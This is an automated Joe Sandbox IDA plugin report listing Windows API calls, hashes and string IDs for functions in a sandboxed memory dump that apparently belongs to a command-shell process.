Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: wcschr$iswdigit
• String ID: +-~!$<>+-*/%()|^&=,
• API String ID: 2770779731-632268628
• Opcode ID: dc3d196b0716b83ed1f5a19bb1a4f94039ffdef0e4e970c338437aa876146c60
• Instruction ID: 5051747d411923dba89992f80cf1407cf4f8129a0afefcc340d562d5f06272b3
• Opcode Fuzzy Hash: dc3d196b0716b83ed1f5a19bb1a4f94039ffdef0e4e970c338437aa876146c60
• Instruction Fuzzy Hash: 8811CE3220425A9FA7349FBEE85487677ECFF9A764320142EF680E7260EB31CD019621
APIs
  • Part of subcall function 00EE9A11: _get_osfhandle.MSVCRT ref: 00EE9A1C
  • Part of subcall function 00EE9A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EE793A,00000104,?), ref: 00EE9A2B
  • Part of subcall function 00EE9A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A47
  • Part of subcall function 00EE9A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A56
  • Part of subcall function 00EE9A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A61
  • Part of subcall function 00EE9A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A6A
• _get_osfhandle.MSVCRT ref: 00EF86E3
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF86EB
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00EF872A
• _get_osfhandle.MSVCRT ref: 00EF8743
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF874B
  • Part of subcall function 00EE9B3B: _get_osfhandle.MSVCRT ref: 00EE9B4E
  • Part of subcall function 00EE9B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00F20AF0,000000FF,00F1A7F0,00002000,00000000,00000000), ref: 00EE9B8E
  • Part of subcall function 00EE9B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F0,-00000001,?,00000000), ref: 00EE9BA3
• longjmp.MSVCRT(00F20A30,00000001), ref: 00EF87CE
Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1333215474-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 93d57310f05870d344921d254ce2a7f1d55341ef71a3b6dd483c4336f025e128
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: eba6982a8e8a7437146e8d37edd9c3433e1269955bfe1cbb1d2c7ee7705db121
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93d57310f05870d344921d254ce2a7f1d55341ef71a3b6dd483c4336f025e128
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0551C370B00309ABDB24FB75D94AB7EB3A4EB00715F10592AE606F71C1EB74DD41CA50
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                      • iswspace.MSVCRT ref: 00EE61E4
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3458554142-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1dae6f9aca4d73e40af1009598af5a274e515b8d2da1acd088b2ef76dc41786b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ebc573163f8fd064915a910bedbb6e82e0093ae0a4cbbe56b1340d548997520a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dae6f9aca4d73e40af1009598af5a274e515b8d2da1acd088b2ef76dc41786b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B91CB70A0024C9BDB24DF6AEC01ABAB7F5FF58344F14902AE946E72A1EB315841DB55
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: ELSE$IF/?
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2081463915-1134991328
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 19b06d225bc41fa05f22ca205c8d9613f6e561a95de02d598117a8b1c7b7d255
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ebe31d8fabf203555fce8cd63e20e7962232098a6216619433d20bcf275db782
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b06d225bc41fa05f22ca205c8d9613f6e561a95de02d598117a8b1c7b7d255
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6051283260438E8AE734DB36AC56B7633E59B80354F39743EE641B60D1EBB5E841DB12
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF643A: NtOpenThreadToken.NTDLL ref: 00EF6454
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00EF646C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF643A: NtClose.NTDLL ref: 00EF64BD
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 00EF63B5
                                                                                                                                                                                                                                                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00EF63E3
                                                                                                                                                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 00F01EF4
                                                                                                                                                                                                                                                                                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00F01EFB
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00F01F6B
                                                                                                                                                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 00F01F86
                                                                                                                                                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 00F01FA4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00F09C96,00EFFDFA,00000000,?), ref: 00EF642F
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
• String ID:
• API String ID: 1313749407-0
• Opcode ID: 42502806a7cb474f2d1791eeedd5d901f670012d3f9a569917c72d4fe7516a3d
• Instruction ID: 5cfefe1b4f121bdf81259a9be4efe4990351d1693ed8e6e46377aa64f1f384f5
• Opcode Fuzzy Hash: 42502806a7cb474f2d1791eeedd5d901f670012d3f9a569917c72d4fe7516a3d
• Instruction Fuzzy Hash: CB51E231A0122E9BCF249F659C887BEB3E5FB94314F1451A9EA05E7290EB70DD81EB50
APIs
• memset.MSVCRT ref: 00F09AC2
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00F09B22
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00F09B32
• SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00F09BAD
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00F09BB8
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00F09BCB
• ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 00F09BF9
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Error$CurrentDirectoryModememset$Last
• String ID:
• API String ID: 1725644760-0
• Opcode ID: 4b5201a78133e219b7a12112d927257ede44559467724d05933c31496a717b2e
• Instruction ID: 0c83f91cef796599d3ef06eee1837b69dec3f83334a6b5aa9450c8fd7fdb65ca
• Opcode Fuzzy Hash: 4b5201a78133e219b7a12112d927257ede44559467724d05933c31496a717b2e
• Instruction Fuzzy Hash: CC41CF71E052189BDF24DBA4EC85BEEB3B4EF58320F008199E805E7291FB749A41EB55
APIs
  • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
  • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00EF1775,-00000001,-00000001,-00000001,-00000001), ref: 00EF2650
• _get_osfhandle.MSVCRT ref: 00EFF339
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00EF1775,-00000001,-00000001,-00000001,-00000001), ref: 00EFF347
• longjmp.MSVCRT(00F20A30,00000001,?,00000104,00000000,?,?,00EF1775,-00000001,-00000001,-00000001,-00000001), ref: 00EFF383
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00EF87F0,?,?,?,00EF87F0,00000000,?,00EE4A0A), ref: 00EFF390
  • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
  • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
• String ID: J
• API String ID: 158340877-201899326
• Opcode ID: 116b36d22417efa6cf69dca8d37b752a3fc2ff1131e7a480cac2802184d61807
• Instruction ID: 21f4433e35c70c9ad4895ee0f613eb2a6139e5c9507c076323cb17a670d483d5
• Opcode Fuzzy Hash: 116b36d22417efa6cf69dca8d37b752a3fc2ff1131e7a480cac2802184d61807
• Instruction Fuzzy Hash: F531BC72E003099FD720AF75C845A7EBBF8EF48B16B10482EEA46E6150EB74D801DB50
APIs
• RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 00F0B717
• GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00F0B72A
• RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 00F0B7FC
  • Part of subcall function 00EE8235: _get_osfhandle.MSVCRT ref: 00EE824E
  • Part of subcall function 00EE8235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EE8256
  • Part of subcall function 00EE8235: _get_osfhandle.MSVCRT ref: 00EE8264
  • Part of subcall function 00EE8235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EE826C
• memset.MSVCRT ref: 00F0B76D
• GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 00F0B788
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
                                                                                                                                                                                                                                                                                                                                                      • String ID: <
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1664749912-4251816714
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b8377c3fbf9c4e9d3e0b7652b65f524d64ad28000836245036e6e4053df65ab0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5a60895c0ad3d4f40fcead51a403839e0909df4cb50ba805483624f11ebbe518
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8377c3fbf9c4e9d3e0b7652b65f524d64ad28000836245036e6e4053df65ab0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD310D75D0020DDFCB11DFA9D885ADEBBF8EF44355F148016E905E3391DB309945AB61
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00EE4D66
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00EE4D8A
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00EE4D95
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR$p~]u
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3677997916-4185707875
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0416d6c2d404a48037f945b7aaa3cf94fca18aae77de126fadbd6aedb0a5b661
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b7e43b3b2eb06d522cfbfdbe00c7c40c5dd25e89aef42011c15c234c3a0edd78
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0416d6c2d404a48037f945b7aaa3cf94fca18aae77de126fadbd6aedb0a5b661
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 250131B2E4025CFBDB219B95DC45FDEBBF8EB84750F100156FA11F2180D2709A41EA51
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE8203
                                                                                                                                                                                                                                                                                                                                                      • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE820E
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE8229
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EFB0AB
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EFB0C1
                                                                                                                                                                                                                                                                                                                                                      • fprintf.MSVCRT ref: 00EFB0D5
                                                                                                                                                                                                                                                                                                                                                      • fflush.MSVCRT ref: 00EFB0E3
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4271573189-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ad09250c6670c5a7759573c622669fa0d0e113e95c7731dfab37682759788053
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c4d062c38c841026664b22bbc47226189ff988cde067c23bf4049a579e67c4cd
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad09250c6670c5a7759573c622669fa0d0e113e95c7731dfab37682759788053
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D01A23000921CFFDB10ABE8ED0EA9A7BADEF05325F144144F115A21F1CBB54A12BB63
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF3D30
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00EF3E3D
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00EF3E88
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$FullNamePath
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3158150540-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c0d9055bed37060302b5e1fc5a7834f17e727aa198e3cb207c42caf255015a6d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 18961cea6b25575fe05b761e394bac94b61993189198780cb28e37562f352fdc
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0d9055bed37060302b5e1fc5a7834f17e727aa198e3cb207c42caf255015a6d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4402C535A002199BCB24DF68DC957B9B3B1FF48314F5881E9D90AA7390E735AE82CF54
APIs
• _get_osfhandle.MSVCRT ref: 00EF858D
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF8595
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00EF85D4
• _get_osfhandle.MSVCRT ref: 00EF85ED
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF85F5
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Console$Write_get_osfhandle$Mode
• String ID:
• API String ID: 1066134489-0
• Opcode ID: 926aaccc232157e1f709a504026c1d323824e2fca760af692a934ddb172ab722
• Instruction ID: 55089dcddd8b5baaef0d8624b4b9af8b1c132b43b029427074bf9aa9964d23bc
• Opcode Fuzzy Hash: 926aaccc232157e1f709a504026c1d323824e2fca760af692a934ddb172ab722
• Instruction Fuzzy Hash: E841D471A002099BDF28DF79DD89ABEB3A4EB40308F155469EA46FB1C6EE70DD01CA51
APIs
• _tell.MSVCRT ref: 00EEB7F9
• _close.MSVCRT ref: 00EEB82C
• memset.MSVCRT ref: 00EEB8CC
• GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00EEB936
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EEB947
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EEB96D
Memory Dump Source
